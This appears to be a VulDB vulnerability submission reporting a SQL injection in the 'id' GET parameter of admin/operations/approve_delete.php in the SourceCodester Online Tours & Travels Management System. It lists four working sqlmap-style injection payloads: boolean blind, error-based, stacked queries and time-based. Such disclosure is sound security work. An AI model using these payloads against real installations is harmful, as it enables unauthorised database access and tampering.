提交 #104752: SourceCodester Online Tours & Travels Management System approve_delete.php sql injection信息

标题SourceCodester Online Tours & Travels Management System approve_delete.php sql injection
描述SourceCodester Online Tours & Travels Management System approve_delete.php sql injection Url: admin/operations/approve_delete.php Abstract: Line 19 of approve_delete.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands. Explanation: SQL injection errors occur when: Data enters a program from an untrusted source. The data is used to dynamically construct a SQL query. In this case, the data is passed to exec() in approve_delete.php on line 19. Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=111' RLIKE (SELECT (CASE WHEN (4667=4667) THEN 111 ELSE 0x28 END))-- lhaO Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: id=111' AND GTID_SUBSET(CONCAT(0x7178787a71,(SELECT (ELT(8710=8710,1))),0x7162787671),8710)-- bkLB Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: id=111';SELECT SLEEP(5)# Type: time-based blind Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK) Payload: id=111' AND 6617=BENCHMARK(5000000,MD5(0x594c6e67))-- jult Download Code: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html
来源⚠️ https://blog.csdn.net/weixin_43864034/article/details/129729911
用户 xiaoliang (UID 43581)
提交2023-03-23 07時22分 (3 年前)
管理2023-03-23 08時28分 (1 hour later)
状态已接受
VulDB条目223654 [SourceCodester Online Tours & Travels Management System 1.0 approve_delete.php exec 标识符 SQL注入]
积分20

Want to stay up to date on a daily basis?

Enable the mail alert feature now!